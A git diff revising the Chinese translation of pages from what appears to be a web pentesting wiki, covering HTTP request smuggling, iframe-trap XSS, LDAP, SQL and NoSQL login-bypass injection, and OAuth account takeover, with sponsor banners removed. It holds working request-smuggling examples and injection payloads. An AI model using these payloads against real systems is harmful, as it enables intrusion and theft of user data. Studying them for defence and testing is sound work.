+- 后端服务器尊重`Content-Length`,仅处理请求的初始部分(`7b`字节),将其余部分视为意外的后续请求的一部分。
 - **示例:**
 
 ```
@@ -112,7 +104,7 @@ x=
 
 #### TE.TE 漏洞(两者都使用Transfer-Encoding,并进行模糊处理)
 
-- **服务器**:两者都支持`Transfer-Encoding`,但可以通过模糊处理欺骗其中一个忽略它。
+- **服务器:** 两者都支持`Transfer-Encoding`,但可以通过模糊处理使其中一个忽略它。
 - **攻击场景:**
 
 - 攻击者发送一个带有模糊处理`Transfer-Encoding`头的请求。
@@ -170,7 +162,7 @@ Non-Empty Body
 #### TE.0 场景
 
 - 类似于前一个场景,但使用TE。
-- 技术[在此报告](https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/)
+- 技术[在此报告](https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/)。
 - **示例**:
 ```
 OPTIONS / HTTP/1.1
@@ -209,7 +201,7 @@ Connection: Content-Length
 
 ## 查找 HTTP 请求走私
 
-识别 HTTP 请求走私漏洞通常可以通过时间技术实现,这依赖于观察服务器响应被操纵请求所需的时间。这些技术对于检测 CL.TE 和 TE.CL 漏洞特别有用。除了这些方法,还有其他策略和工具可以用来发现此类漏洞:
+识别 HTTP 请求走私漏洞通常可以通过时间技术实现,这依赖于观察服务器响应被操纵请求所需的时间。这些技术对于检测 CL.TE 和 TE.CL 漏洞特别有用。除了这些方法,还有其他策略和工具可以用来查找此类漏洞:
 
 ### 使用时间技术查找 CL.TE 漏洞
 
@@ -265,11 +257,11 @@ X
 - **差异响应分析:**
 - 发送略有不同版本的请求,观察服务器响应是否以意外方式不同,指示解析差异。
 - **使用自动化工具:**
-- 像 Burp Suite 的 'HTTP Request Smuggler' 扩展可以通过发送各种模糊请求并分析响应来自动测试这些漏洞。
+- 像 Burp Suite 的 'HTTP Request Smuggler' 扩展可以通过发送各种模糊请求并分析响应,自动测试这些漏洞。
 - **Content-Length 变异测试:**
 - 发送具有不同 `Content-Length` 值的请求,这些值与实际内容长度不一致,并观察服务器如何处理此类不匹配。
 - **Transfer-Encoding 变异测试:**
-- 发送具有模糊或格式错误的 `Transfer-Encoding` 头的请求,并监控前端和后端服务器对这种操控的不同响应。
+- 发送带有模糊或格式错误的 `Transfer-Encoding` 头的请求,并监控前端和后端服务器对这种操控的不同响应。
 
 ### HTTP 请求走私漏洞测试
 
@@ -279,7 +271,7 @@ X
 
 在通过干扰其他请求测试请求走私漏洞时,请记住:
 
-- **独立的网络连接:** “攻击”和“正常”请求应通过独立的网络连接发送。对两个请求使用相同的连接并不能验证漏洞的存在。
+- **独立网络连接:** “攻击”和“正常”请求应通过独立的网络连接发送。对两者使用相同连接并不能验证漏洞的存在。
 - **一致的 URL 和参数:** 力求对两个请求使用相同的 URL 和参数名称。现代应用程序通常根据 URL 和参数将请求路由到特定的后端服务器。匹配这些可以增加两个请求由同一服务器处理的可能性,这是成功攻击的前提。
 - **时间和竞争条件:** “正常”请求旨在检测“攻击”请求的干扰,与其他并发应用请求竞争。因此,在“攻击”请求后立即发送“正常”请求。繁忙的应用程序可能需要多次尝试以确认漏洞。
 - **负载均衡挑战:** 作为负载均衡器的前端服务器可能会将请求分配到不同的后端系统。如果“攻击”和“正常”请求最终落在不同的系统上,攻击将不会成功。这个负载均衡方面可能需要多次尝试以确认漏洞。
@@ -332,7 +324,7 @@ a=x
 
 ### 揭示前端请求重写 
 
-应用程序通常使用**前端服务器**来修改传入请求,然后将其传递给后端服务器。典型的修改涉及添加头信息,例如`X-Forwarded-For: `,以将客户端的IP转发给后端。理解这些修改可能至关重要,因为它可能揭示**绕过保护**或**发现隐藏的信息或端点**的方法。
+应用程序通常使用**前端服务器**来修改传入请求,然后将其传递给后端服务器。典型的修改涉及添加头部,例如`X-Forwarded-For: `,以将客户端的IP转发给后端。理解这些修改可能至关重要,因为它可能揭示**绕过保护**或**发现隐藏的信息或端点**的方法。
 
 要调查代理如何更改请求,找到一个后端在响应中回显的POST参数。然后,构造一个请求,使用这个参数作为最后一个,类似于以下内容:
 ```
@@ -385,7 +377,7 @@ csrf=gpGAVAbj7pKq7VfFh45CAICeFCnancCM&postId=4&name=asdfghjklo&email=email%40ema
 ```
 在这种情况下,**comment 参数**旨在存储在公开可访问页面的帖子评论部分中的内容。因此,后续请求的内容将作为评论出现。
 
-然而,这种技术有其局限性。通常,它仅捕获 smuggled 请求中使用的参数分隔符之前的数据。对于 URL 编码的表单提交,这个分隔符是 `&` 字符。这意味着从受害者用户请求中捕获的内容将在第一个 `&` 处停止,这可能甚至是查询字符串的一部分。
+然而,这种技术有其局限性。通常,它仅捕获直到在走私请求中使用的参数分隔符的数据。对于 URL 编码的表单提交,这个分隔符是 `&` 字符。这意味着从受害者用户的请求中捕获的内容将在第一个 `&` 处停止,这可能甚至是查询字符串的一部分。
 
 此外,值得注意的是,这种方法在 TE.CL 漏洞中也是可行的。在这种情况下,请求应以 `search=\r\n0` 结束。无论换行符如何,值将附加到搜索参数。
 
@@ -394,9 +386,9 @@ csrf=gpGAVAbj7pKq7VfFh45CAICeFCnancCM&postId=4&name=asdfghjklo&email=email%40ema
 HTTP 请求走私可以被用来利用易受 **反射型 XSS** 攻击的网页,提供显著的优势:
 
 - **不需要**与目标用户互动。
-- 允许在 **通常无法达到** 的请求部分中利用 XSS,例如 HTTP 请求头。
+- 允许在请求的 **通常无法达到** 的部分利用 XSS,例如 HTTP 请求头。
 
-在网站通过 User-Agent 头部易受反射型 XSS 攻击的情况下,以下有效载荷演示了如何利用此漏洞:
+在网站通过 User-Agent 头易受反射型 XSS 攻击的情况下,以下有效载荷演示了如何利用此漏洞:
 ```
 POST / HTTP/1.1
 Host: ac311fa41f0aa1e880b0594d008d009e.web-security-academy.net
@@ -430,7 +422,7 @@ A=
 > [!CAUTION]
 > 如果用户内容在响应中以 **`Content-type`** 反射,例如 **`text/plain`**,将阻止 XSS 的执行。如果服务器支持 **HTTP/0.9,可能可以绕过这一点**!
 
-HTTP/0.9 版本早于 1.0,仅使用 **GET** 动词,并且 **不** 响应 **头部**,只有主体。
+版本 HTTP/0.9 早于 1.0,仅使用 **GET** 动词,并且 **不** 响应 **头部**,只有主体。
 
 在 [**这篇文章**](https://mizu.re/post/twisty-python) 中,利用了请求走私和一个 **会回复用户输入的易受攻击端点** 来走私一个 HTTP/0.9 请求。响应中反射的参数包含一个 **伪造的 HTTP/1.1 响应(带有头部和主体)**,因此响应将包含有效的可执行 JS 代码,`Content-Type` 为 `text/html`。
 
@@ -478,7 +470,7 @@ Location: https://attacker-website.com/home/
 
 如果 **前端基础设施的任何组件缓存内容**,通常是为了提高性能,则可以执行 Web 缓存中毒。通过操纵服务器的响应,可以 **毒化缓存**。
 
-之前,我们观察到如何改变服务器响应以返回 404 错误(参见 [Basic Examples](./#basic-examples))。同样,可以欺骗服务器以响应对 `/static/include.js` 的请求而提供 `/index.html` 内容。因此,`/static/include.js` 的内容在缓存中被替换为 `/index.html` 的内容,使得 `/static/include.js` 对用户不可访问,可能导致服务拒绝(DoS)。
+之前,我们观察到如何改变服务器响应以返回 404 错误(参见 [Basic Examples](./#basic-examples))。同样,可以欺骗服务器在请求 `/static/include.js` 时返回 `/index.html` 内容。因此,`/static/include.js` 的内容在缓存中被替换为 `/index.html` 的内容,使得 `/static/include.js` 对用户不可访问,可能导致服务拒绝(DoS)。
 
 如果发现 **开放重定向漏洞** 或者存在 **指向开放重定向的站内重定向**,这种技术变得特别强大。这些漏洞可以被利用来将 `/static/include.js` 的缓存内容替换为攻击者控制的脚本,从而实质上使所有请求更新的 `/static/include.js` 的客户端面临广泛的跨站脚本(XSS)攻击。
 
@@ -510,8 +502,8 @@ x=1
 
 > **web cache poisoning 和 web cache deception 之间有什么区别?**
 >
-> - 在 **web cache poisoning** 中,攻击者导致应用程序在缓存中存储一些恶意内容,并且这些内容从缓存中提供给其他应用程序用户。
-> - 在 **web cache deception** 中,攻击者导致应用程序在缓存中存储属于另一个用户的一些敏感内容,然后攻击者从缓存中检索这些内容。
+> - 在 **web cache poisoning** 中,攻击者使应用程序在缓存中存储一些恶意内容,并且这些内容从缓存中提供给其他应用程序用户。
+> - 在 **web cache deception** 中,攻击者使应用程序在缓存中存储属于另一个用户的一些敏感内容,然后攻击者从缓存中检索这些内容。
 
 攻击者构造一个走私请求,以获取敏感的用户特定内容。考虑以下示例:
 ```markdown
@@ -534,7 +526,7 @@ TRACE / HTTP/1.1
 Host: example.com
 XSS: 
 ```
-请发送您的请求。
+请发送响应,例如:
 ```
 HTTP/1.1 200 OK
 Content-Type: message/http
@@ -595,7 +587,7 @@ Content-Length: 50
 
 
 ```
-### 利用 HTTP 响应去同步化进行 HTTP 请求走私
+### 利用 HTTP 响应不同步进行 HTTP 请求走私
 
 您是否发现了一些 HTTP 请求走私漏洞,但不知道如何利用它?尝试这些其他的利用方法:
 
@@ -713,7 +705,7 @@ table.add(req)
 - [https://github.com/Moopinger/smugglefuzz](https://github.com/Moopinger/smugglefuzz)
 - [https://github.com/bahruzjabiyev/t-reqs-http-fuzzer](https://github.com/bahruzjabiyev/t-reqs-http-fuzzer): 该工具是一个基于语法的HTTP Fuzzer,有助于发现奇怪的请求走私差异。
 
-## 参考
+## 参考资料
 
 - [https://portswigger.net/web-security/request-smuggling](https://portswigger.net/web-security/request-smuggling)
 - [https://portswigger.net/web-security/request-smuggling/finding](https://portswigger.net/web-security/request-smuggling/finding)
@@ -725,12 +717,5 @@ table.add(req)
 - [https://portswigger.net/research/trace-desync-attack](https://portswigger.net/research/trace-desync-attack)
 - [https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/](https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/)
 
-

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**发现并报告具有实际商业影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/iframe-traps.md b/src/pentesting-web/iframe-traps.md
index c347765b6..dace83453 100644
--- a/src/pentesting-web/iframe-traps.md
+++ b/src/pentesting-web/iframe-traps.md
@@ -2,23 +2,22 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-This form of abusing XSS via iframes to steal information from the user moving across the web page was originally published in these 2 post from trustedsec.com: [**here**](https://trustedsec.com/blog/persisting-xss-with-iframe-traps) **and** [**here**](https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams).
+这种通过 iframe 滥用 XSS 来窃取用户在网页上移动时的信息的形式最初在 trustedsec.com 的这两篇文章中发布:[**这里**](https://trustedsec.com/blog/persisting-xss-with-iframe-traps) **和** [**这里**](https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams)。
 
-The attack start in a page vulnerable to a XSS where it’s possible to make the **victims don’t leave the XSS** by making them **navigate within an iframe** that occupies all the web application.
+攻击开始于一个易受 XSS 攻击的页面,在这里可以让 **受害者不离开 XSS**,通过让他们 **在一个占据整个网页应用的 iframe 中导航**。
 
-The XSS attack will basically load the web page in an iframe in 100% of the screen. Therefore, the victim **won't notice he is inside an iframe**. Then, if the victim navigates in the page by clicking links inside the iframe (inside the web), he will be **navigating inside the iframe** with the arbitrary JS loaded stealing information from this navigation.
+XSS 攻击基本上会在 100% 的屏幕上加载网页到一个 iframe 中。因此,受害者 **不会注意到他在一个 iframe 中**。然后,如果受害者通过点击 iframe 内的链接(在网页内)进行页面导航,他将 **在 iframe 内导航**,使用加载的任意 JS 窃取此导航中的信息。
 
-Moreover, to make it more realistic, it’s possible to use some **listeners** to check when an iframe changes the location of the page, and update the URL of the browser with that locations the user things he’s is moving pages using the browser.
+此外,为了使其更真实,可以使用一些 **监听器** 来检查 iframe 何时更改页面的位置,并用用户认为他正在使用浏览器移动页面的那些位置更新浏览器的 URL。
 
 
https://www.trustedsec.com/wp-content/uploads/2022/04/regEvents.png

 
 
https://www.trustedsec.com/wp-content/uploads/2022/04/fakeAddress-1.png

 
-Moreover, it's possible to use listeners to steal sensitive information, not only the other pages the victim is visiting, but also the data used to **filled forms** and send them (credentials?) or to **steal the local storage**...
+此外,可以使用监听器来窃取敏感信息,不仅是受害者正在访问的其他页面,还有用于 **填写表单** 的数据并发送它们(凭据?)或 **窃取本地存储**...
 
-Ofc, the main limitations are that a **victim closing the tab or putting another URL in the browser will escape the iframe**. Another way to do this would be to **refresh the page**, however, this could be partially **prevented** by disabling the right click context menu every time a new page is loaded inside the iframe or noticing when the mouse of the user leaves the iframe, potentially to click the reload button of the browser and in this case the URL of the browser is updated with the original URL vulnerable to XSS so if the user reloads it, it will get poisoned again (note that this is not very stealth).
+当然,主要的限制是 **受害者关闭标签页或在浏览器中输入另一个 URL 将逃离 iframe**。另一种方法是 **刷新页面**,然而,这可能会通过在每次新页面加载到 iframe 内时禁用右键上下文菜单或注意用户的鼠标何时离开 iframe 来部分 **防止**,可能是为了点击浏览器的刷新按钮,在这种情况下,浏览器的 URL 会更新为原始的易受 XSS 攻击的 URL,因此如果用户刷新它,它将再次被污染(请注意,这并不是非常隐蔽)。
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/ldap-injection.md b/src/pentesting-web/ldap-injection.md
index 7ee068090..48d8438c8 100644
--- a/src/pentesting-web/ldap-injection.md
+++ b/src/pentesting-web/ldap-injection.md
@@ -4,12 +4,6 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-如果你对 **黑客职业** 感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!** (_需要流利的波兰语书写和口语能力_).
-
-{% embed url="https://www.stmcyber.com/careers" %}
-
 ## LDAP 注入
 
 ### **LDAP**
@@ -20,7 +14,7 @@
 ../network-services-pentesting/pentesting-ldap.md
 {{#endref}}
 
-**LDAP 注入** 是一种针对从用户输入构建 LDAP 语句的 web 应用程序的攻击。当应用程序 **未能正确清理** 输入时,攻击者可以通过本地代理 **操纵 LDAP 语句**,这可能导致未经授权的访问或数据操纵。
+**LDAP 注入** 是一种针对从用户输入构建 LDAP 语句的 web 应用程序的攻击。当应用程序 **未能正确清理** 输入时,就会发生这种情况,攻击者可以通过本地代理 **操纵 LDAP 语句**,可能导致未经授权的访问或数据操纵。
 
 {% file src="../images/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf" %}
 
@@ -46,19 +40,19 @@
 
 你可以访问数据库,这可能包含多种不同类型的信息。
 
-**OpenLDAP**: 如果到达 2 个过滤器,只执行第一个。\
-**ADAM 或 Microsoft LDS**: 2 个过滤器会抛出错误。\
-**SunOne Directory Server 5.0**: 执行两个过滤器。
+**OpenLDAP**:如果到达 2 个过滤器,只执行第一个。\
+**ADAM 或 Microsoft LDS**:有 2 个过滤器时会抛出错误。\
+**SunOne Directory Server 5.0**:执行两个过滤器。
 
 **发送过滤器时使用正确的语法非常重要,否则会抛出错误。最好只发送 1 个过滤器。**
 
-过滤器必须以 `&` 或 `|` 开头\
-示例: `(&(directory=val1)(folder=public))`
+过滤器必须以:`&` 或 `|` 开头\
+示例:`(&(directory=val1)(folder=public))`
 
 `(&(objectClass=VALUE1)(type=Epson*))`\
 `VALUE1 = *)(ObjectClass=*))(&(objectClass=void`
 
-然后: `(&(objectClass=`**`*)(ObjectClass=*))`** 将是第一个过滤器(被执行的那个)。
+然后:`(&(objectClass=`**`*)(ObjectClass=*))`** 将是第一个过滤器(被执行的那个)。
 
 ### 登录绕过
 
@@ -211,10 +205,5 @@ intitle:"phpLDAPadmin" inurl:cmd.php
 
 {% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
 
-

-
-如果你对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!** (_需要流利的波兰语书写和口语能力_)。
-
-{% embed url="https://www.stmcyber.com/careers" %}
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/login-bypass/README.md b/src/pentesting-web/login-bypass/README.md
index ea785887e..d09e37683 100644
--- a/src/pentesting-web/login-bypass/README.md
+++ b/src/pentesting-web/login-bypass/README.md
@@ -2,24 +2,18 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的活动之一。该大会的 **使命是促进技术知识**,是各个学科技术和网络安全专业人士的热烈交流平台。
-
-{% embed url="https://www.rootedcon.com/" %}
-
 ## **绕过常规登录**
 
-如果你发现了登录页面,这里有一些可以尝试绕过它的技术:
+如果你发现一个登录页面,这里有一些技术可以尝试绕过它:
 
 - 检查页面内的 **评论**(向下滚动并向右?)
 - 检查是否可以 **直接访问受限页面**
-- 检查 **不发送参数**(不发送任何或仅发送 1 个)
+- 检查 **不发送参数**(不要发送任何或仅发送1个)
 - 检查 **PHP 比较错误:** `user[]=a&pwd=b` , `user=a&pwd[]=b` , `user[]=a&pwd[]=b`
 - **将内容类型更改为 json** 并发送 json 值(包括 bool true)
-- 如果你收到一条消息说不支持 POST,你可以尝试以 **GET 请求发送 JSON 到主体**,并设置 `Content-Type: application/json`
-- 检查 nodejs 潜在的解析错误(阅读 [**这篇文章**](https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4)): `password[password]=1`
-- Nodejs 会将该有效负载转换为类似以下的查询: ` SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` `` `**`password=password=1`**`;` 这使得密码部分始终为真。
+- 如果你收到一条响应,表示不支持 POST,你可以尝试以 **GET 请求发送 JSON 到主体**,并设置 `Content-Type: application/json`
+- 检查 nodejs 潜在的解析错误(阅读 [**这个**](https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4)): `password[password]=1`
+- Nodejs 会将该有效负载转换为类似以下的查询: ` SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` `` `**`password=password=1`**`;` 这使得密码位始终为真。
 - 如果你可以发送 JSON 对象,你可以发送 `"password":{"password": 1}` 来绕过登录。
 - 记住,要绕过此登录,你仍然需要 **知道并发送有效的用户名**。
 - **在调用 `mysql.createConnection` 时添加 `"stringifyObjects":true`** 选项将最终 **阻止在参数中传递 `Object` 时的所有意外行为**。
@@ -85,21 +79,17 @@ admin))(|(|
 
 ### 重定向
 
-页面通常在登录后会重定向用户,检查你是否可以更改该重定向以造成 [**开放重定向**](../open-redirect.md)。如果你将用户重定向到你的网站,可能会窃取一些信息(代码、cookies...)。
+页面通常在登录后会重定向用户,检查你是否可以更改该重定向以导致 [**开放重定向**](../open-redirect.md)。如果你将用户重定向到你的网站,可能会窃取一些信息(代码、cookies...)。
 
 ## 其他检查
 
 - 检查你是否可以通过登录功能 **枚举用户名**。
-- 检查密码/**敏感**信息 **表单** **输入** 中是否激活了 **自动完成**:``
+- 检查密码/**敏感**信息 **表单** **输入** 中是否启用了 **自动完成**:``
 
-## 自动工具
+## 自动化工具
 
 - [HTLogin](https://github.com/akinerkisa/HTLogin)
 
-

 
-​​[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的事件之一。该大会 **旨在促进技术知识**,是各个学科技术和网络安全专业人士的一个热烈交流点。
-
-{% embed url="https://www.rootedcon.com/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/login-bypass/sql-login-bypass.md b/src/pentesting-web/login-bypass/sql-login-bypass.md
index 976a030af..d6d2f3c0f 100644
--- a/src/pentesting-web/login-bypass/sql-login-bypass.md
+++ b/src/pentesting-web/login-bypass/sql-login-bypass.md
@@ -1,16 +1,8 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
 此列表包含**通过XPath、LDAP和SQL注入绕过登录的有效载荷**(按此顺序)。
 
-使用此列表的方法是将**前200行作为用户名和密码。** 然后,将完整列表放在用户名输入框中,然后在密码输入框中放入一些密码(如 _Pass1234._)或一些已知用户名(如 _admin_)。
+使用此列表的方法是将**前200行作为用户名和密码。** 然后,将完整列表放在用户名输入框中,接着在密码输入框中放入一些密码(如 _Pass1234._)或一些已知用户名(如 _admin_)。
 ```
 admin
 password
@@ -817,12 +809,4 @@ Pass1234." and 1=0 union select "admin",sha("Pass1234.")#
 %8C%A8%27)||1-- 2
 %bf')||1-- 2
 ```
-

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/nosql-injection.md b/src/pentesting-web/nosql-injection.md
index dcf316e99..5fe62c586 100644
--- a/src/pentesting-web/nosql-injection.md
+++ b/src/pentesting-web/nosql-injection.md
@@ -1,20 +1,12 @@
 # NoSQL 注入
 
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
-立即获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=nosql-injection" %}
-
 {{#include ../banners/hacktricks-training.md}}
 
 ## 利用
 
-在 PHP 中,您可以通过将发送的参数从 _parameter=foo_ 更改为 _parameter\[arrName]=foo._ 来发送一个数组。
+在 PHP 中,您可以通过将发送的参数从 _parameter=foo_ 更改为 _parameter\[arrName]=foo_ 来发送一个数组。
 
-这些利用基于添加一个 **运算符**:
+这些利用基于添加一个 **Operator**:
 ```bash
 username[$ne]=1$password[$ne]=1 #
 username[$regex]=^adm$password[$ne]=1 #Check a , could be used to brute-force a parameter
@@ -94,7 +86,7 @@ in JSON
 
 ### 从不同集合获取信息
 
-可以使用 [**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) 从不同集合获取信息。在以下示例中,我们从一个名为 **`users`** 的 **不同集合** 中读取,并获取 **所有条目** 的 **结果**,这些条目的密码与通配符匹配。
+可以使用 [**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) 从不同集合获取信息。在以下示例中,我们正在读取一个名为 **`users`** 的 **不同集合**,并获取 **所有条目** 的结果,这些条目的密码与通配符匹配。
 
 **注意:** 只有在使用 `aggregate()` 函数进行搜索时,`$lookup` 和其他聚合函数才可用,而不是更常见的 `find()` 或 `findOne()` 函数。
 ```json
@@ -116,17 +108,9 @@ in JSON
 }
 ]
 ```
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
-立即获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=nosql-injection" %}
-
 ## MongoDB Payloads
 
-列表 [从这里](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt)
+列表 [from here](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt)
 ```
 true, $where: '1 == 1'
 , $where: '1 == 1'
@@ -247,11 +231,3 @@ get_password(u)
 - [https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb](https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb)
 
 {{#include ../banners/hacktricks-training.md}}
-
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=nosql-injection) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
-今天就获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=nosql-injection" %}
diff --git a/src/pentesting-web/oauth-to-account-takeover.md b/src/pentesting-web/oauth-to-account-takeover.md
index 7cc48238e..39a947f15 100644
--- a/src/pentesting-web/oauth-to-account-takeover.md
+++ b/src/pentesting-web/oauth-to-account-takeover.md
@@ -2,26 +2,22 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-{% embed url="https://websec.nl/" %}
-
 ## 基本信息 
 
-OAuth 提供了多个版本,基础信息可在 [OAuth 2.0 documentation](https://oauth.net/2/) 中获取。本讨论主要集中在广泛使用的 [OAuth 2.0 授权码授权类型](https://oauth.net/2/grant-types/authorization-code/),提供一个 **授权框架,使应用程序能够访问或在另一个应用程序中执行用户账户的操作**(授权服务器)。
+OAuth 提供了多种版本,基础信息可在 [OAuth 2.0 documentation](https://oauth.net/2/) 中获取。本讨论主要集中在广泛使用的 [OAuth 2.0 授权码授权类型](https://oauth.net/2/grant-types/authorization-code/),提供一个 **授权框架,使应用程序能够访问或在另一个应用程序中执行用户账户上的操作**(授权服务器)。
 
-考虑一个假设的网站 _**https://example.com**_,旨在 **展示您所有的社交媒体帖子**,包括私人帖子。为此,使用了 OAuth 2.0。_https://example.com_ 将请求您 **访问您的社交媒体帖子** 的权限。因此,_https://socialmedia.com_ 上会出现一个同意屏幕,概述 **请求的权限和发起请求的开发者**。在您授权后,_https://example.com_ 获得 **代表您访问您的帖子** 的能力。
+考虑一个假设的网站 _**https://example.com**_,旨在 **展示您所有的社交媒体帖子**,包括私人帖子。为此,使用了 OAuth 2.0。_https://example.com_ 将请求您的权限以 **访问您的社交媒体帖子**。因此,_https://socialmedia.com_ 上会出现一个同意屏幕,概述 **请求的权限和发起请求的开发者**。在您授权后,_https://example.com_ 获得了 **代表您访问您的帖子** 的能力。
 
 理解 OAuth 2.0 框架中的以下组件至关重要:
 
 - **资源拥有者**:您,作为 **用户/实体**,授权访问您的资源,例如您的社交媒体账户帖子。
-- **资源服务器**:在应用程序为 `资源拥有者` 获取 `access token` 后,**管理经过身份验证请求的服务器**,例如 **https://socialmedia.com**。
-- **客户端应用程序**:**请求 `资源拥有者` 授权的应用程序**,例如 **https://example.com**。
+- **资源服务器**:在应用程序代表 `资源拥有者` 获取 `access token` 后,**管理经过身份验证请求的服务器**,例如 **https://socialmedia.com**。
+- **客户端应用程序**:向 `资源拥有者` 请求授权的 **应用程序**,例如 **https://example.com**。
 - **授权服务器**:在成功验证 `资源拥有者` 并获得授权后,**向 `客户端应用程序` 发放 `access tokens` 的服务器**,例如 **https://socialmedia.com**。
 - **client_id**:应用程序的公共唯一标识符。
 - **client_secret**:仅为应用程序和授权服务器所知的机密密钥,用于生成 `access_tokens`。
 - **response_type**:指定 **请求的令牌类型** 的值,例如 `code`。
-- **scope**:`客户端应用程序` 请求的 **访问级别**。
+- **scope**:`客户端应用程序` 请求的 `资源拥有者` 的 **访问级别**。
 - **redirect_uri**:用户在授权后被重定向的 **URL**。这通常必须与预注册的重定向 URL 对齐。
 - **state**:一个参数,用于 **在用户重定向到授权服务器及返回时维护数据**。其唯一性对于作为 **CSRF 保护机制** 至关重要。
 - **grant_type**:指示 **授权类型和要返回的令牌类型** 的参数。
@@ -44,7 +40,7 @@ https://socialmedia.com/auth
 &state=randomString123
 ```
 3. 然后您将看到一个同意页面。  
-4. 在您批准后,社交媒体会将带有 `code` 和 `state` 参数的响应发送到 `redirect_uri`:
+4. 在您批准后,社交媒体会向 `redirect_uri` 发送包含 `code` 和 `state` 参数的响应:
 ```
 https://example.com?code=uniqueCode123&state=randomString123
 ```
@@ -70,7 +66,7 @@ Host: socialmedia.com
 
 ### 重定向实现中的 XSS 
 
-正如在这个漏洞赏金报告中提到的 [https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html](https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html),重定向 **URL 可能在用户认证后反映在服务器的响应中**,因此 **容易受到 XSS 攻击**。可能的测试有效载荷:
+正如在这个漏洞赏金报告中提到的 [https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html](https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html),重定向 **URL 可能在用户认证后被反射在服务器的响应中**,因此 **容易受到 XSS 攻击**。可能的测试有效载荷:
 ```
 https://app.victim.com/login?redirectUrl=https://app.victim.com/dashboard
test

 ```
@@ -110,7 +106,7 @@ code=77515&redirect_uri=http%3A%2F%2F10.10.10.10%3A3000%2Fcallback&grant_type=au
 ```
 ### Referer Header leaking Code + State
 
-一旦客户端拥有了 **code 和 state**,如果它们在浏览到不同页面时 **反映在 Referer 头中**,那么就存在漏洞。
+一旦客户端拥有了 **code 和 state**,如果它们在浏览到不同页面时 **反映在 Referer 头中**,那么它就存在漏洞。
 
 ### Access Token Stored in Browser History
 
